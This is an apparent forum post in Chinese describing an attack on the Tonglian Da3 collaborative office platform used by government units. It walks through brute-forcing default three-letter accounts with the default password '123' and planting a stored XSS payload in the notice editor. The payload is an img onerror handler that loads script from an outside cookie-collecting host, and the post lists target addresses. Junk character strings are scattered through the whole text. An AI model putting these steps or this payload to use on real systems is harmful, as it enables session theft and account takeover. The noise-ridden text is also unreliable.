* w7 F5 J+ p" p/ j6 X8 h/ }: i
+ [- x. T7 Q3 Q) U U3 p% Y: n) u# M 同联Da3协同办公平台后台通用储存型xss漏洞
. v2 e% ~6 J- i1 K
9 B/ N# B/ _' a , I6 M e' o; g- z
平台简介:) S- H$ Y0 u4 ]/ C% h
; u& T" R3 r+ @5 ~
4 y" D4 i5 v j+ R: t. O- C8 V& B
& Q8 f4 ]( ~7 U5 b& J7 k; ~+ L+ F
, F V6 U, b9 f" E
" @3 D, U2 ^+ o/ M
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 B3 W( A6 u( R
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; a8 l. x2 z5 Q/ ]- s1 w
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
) }( U) K4 ^0 R
- R$ }2 }2 P4 Y$ F" z1 ]
) `5 M& L- e/ ~& `$ J0 x& N, Y0 Q " j& K/ r/ }7 j% J3 a* D- g* n
' q0 }* T: q& x9 ?& z- A! f: u8 Q( K
' V# V# l* b; J3 p* H: m, o2 a9 V 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
' e* ]$ [- k, o) @( r$ j
- _' g$ [) g e2 d
e% e) J' n0 Z# H" k# k
) \& p8 l, Z! ?" a$ t" l U$ Z
: }' Q# y% b" h; z# ]6 f ( ~0 f; Y. r5 E( f9 x
http://1.1.1.1:7197/cap-aco/#(案例2-). z- g# r. o% o9 Z! p, @
( h+ J( u- O) p9 ~$ S
8 U3 o% D# V' S7 m7 c& _
http://www.XXOO.com (案例1-官网网站)1 L- _1 w I) |
% T1 @& Q9 o" C6 G! w: ]" l& u1 Y% B
( E; \$ D$ S) j3 H j* C2 _ 漏洞详情:
+ N: ^% s, E4 C. k. x$ Y6 G4 I
0 S& J3 Q% h& X1 w# g$ ?; e
' n! T1 H5 ? T
案例一、
" r/ Z) l1 |8 Y( i. [2 z
3 }( q8 s% }& @$ |& k
" ~9 d" e8 A: q" ~& _1 `8 A& y 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
( B8 j0 U, Y! w
y. n* n- l. b L: ?
" [0 P: Z7 ]' G. T# S. h# P* K8 E
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:5 _# l* c& K8 F2 B! p4 [! i$ b4 {
& h N- l) Q6 g4 `! Q1 S- l' {
+ H0 s8 U- B$ C/ Y
! U0 u8 j7 K, T0 \
8 {3 b! P" l6 D) ~4 e
. L; Z8 O' L4 k) `& I
+ p% X: V3 [1 y+ F* g
3 Q. T; T: h5 h/ j3 G i' ^
" }2 y9 O# t: d& E6 z! x. ^
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: / X2 b' q$ w7 s
: C. d) P- P% n- `
9 j+ [. L ?4 ] k7 ~6 F
) U/ d- t6 A* @5 |/ d
! l p# q' l( D8 R3 d2 N
5 d7 L! x! M( H' W1 J. s
$ O* ]7 ~9 c+ W, W9 Z: F& i) q
; o) @; q9 W4 i' I1 z
- q% Y3 K3 U2 U6 f2 E 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
$ }6 F, I3 N1 R( N! m
) \; v- V' Q# j; |; r7 A7 g
/ ^; K9 L, J) d) z8 ]' O0 A
6 I' i2 {* L& R/ N1 z: l; p
! e* _, ?9 g0 l' {" ~' [2 p
& e* \- m% G, X$ P <img src=x$ o2 x0 ]9 b8 S5 P- C- J( U/ I
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
5 E: N0 S& F4 I! |$ \; ?' u
$ p+ |, H6 @, z* |4 n
+ r4 W* Y5 s- ? l
; x4 Y: g% W l" S! v( T0 E
5 `7 y" \% x8 W+ u' V
2 [. o1 H) M# v* i2 Z/ }
然后发送,接收cookie如图: : y2 t. O$ i" t, D6 [+ }
) J4 z0 W2 D* q9 {3 k9 v$ B8 r 1 c- f) }0 s' a/ A% p* I9 b
/ W% Y" ]; `" A' Z* U- J
5 e+ o1 F; {+ w t9 a
2 C- C* k0 \4 X5 J: m! k
- J1 G; R* z" \) v
8 Y9 o* a+ s8 u2 V P) X2 l
+ b6 \1 x( Q. Q! [9 s* o
" c+ m7 a0 @5 k/ B# z$ i
5 r- x! Z u3 Y' Y- @7 A
+ f. B2 k, M' b! |: _0 ? 8 C' `, y( N3 E
4 {- k1 h. h, J+ V$ a7 x- Q
+ x) o: L1 @' v. B: e' Y
9 o& L9 n) k/ \. _7 o/ B/ c
3 `9 ~9 g- `# h7 W) _, b( _
$ J1 w I8 } }7 o1 [' `
- K7 j$ `4 M0 d* M1 p: ]7 f2 [
+ G! n* c$ d6 L( Z
) N" R0 L3 O2 y4 t7 _ Y { : v* `9 z) z: b6 V; N, h7 U
9 r0 ~5 v0 C5 N6 Z; a* d ; z; B' A5 p A6 P& `5 @& \: T! h2 j
案例2、 # O# r: W: ^ f8 ?" X! t
: g1 Q6 E Z/ Z& i , f/ H: N8 Q! j$ B4 K1 ~
前面步骤都一样,下面看效果图:
, g& F* f% i( E3 a0 Z8 L3 p
) @) e8 d# F" ^. B% M 7 R8 l/ l, Z* w) F
# U2 ]6 t3 t4 q4 P7 ~& i
0 B7 o* u; |! T6 D: \% m
4 y2 U+ i2 b+ U+ P
% M7 k s/ {9 J1 D" |& x& }
( |/ q( ]# k3 G, O6 j! N! ^
7 h& W7 }6 {1 [; |# R
) \9 \/ u9 E7 C9 k" g
: F2 q }4 m2 f6 Y4 L# t: ?
1 M2 V7 c. k9 F( X& z) |* U" r. A1 x
1 |! U( ^. J) V) t; a9 a$ U( j
1 M+ w% M8 L' T* t
3 }' \* } {6 F& w) g% w5 u. ?" H9 M
+ G1 B# }+ E: ~$ [
9 |! x$ A2 W( \# Q5 G7 e/ U( u
& t+ m, B# Q- h6 _ 6 K% w8 h; d8 K
& q: B, Q8 i- Z
; I$ ?- i* y. m! N1 d 5 g+ [& Y7 J& Y% L& A
9 U- Z' v* T+ p+ r' e: F3 y# e
% }+ [- E) d( F. d( C
$ H- f/ K0 M3 y$ @ c" _3 e
4 \& J% |. `2 x0 ~& h3 ?! _" f
8 c; V- [* a" s( z: R+ W" d
8 a& E9 N8 P. ^
# M) |! U4 `' Y( p, m% n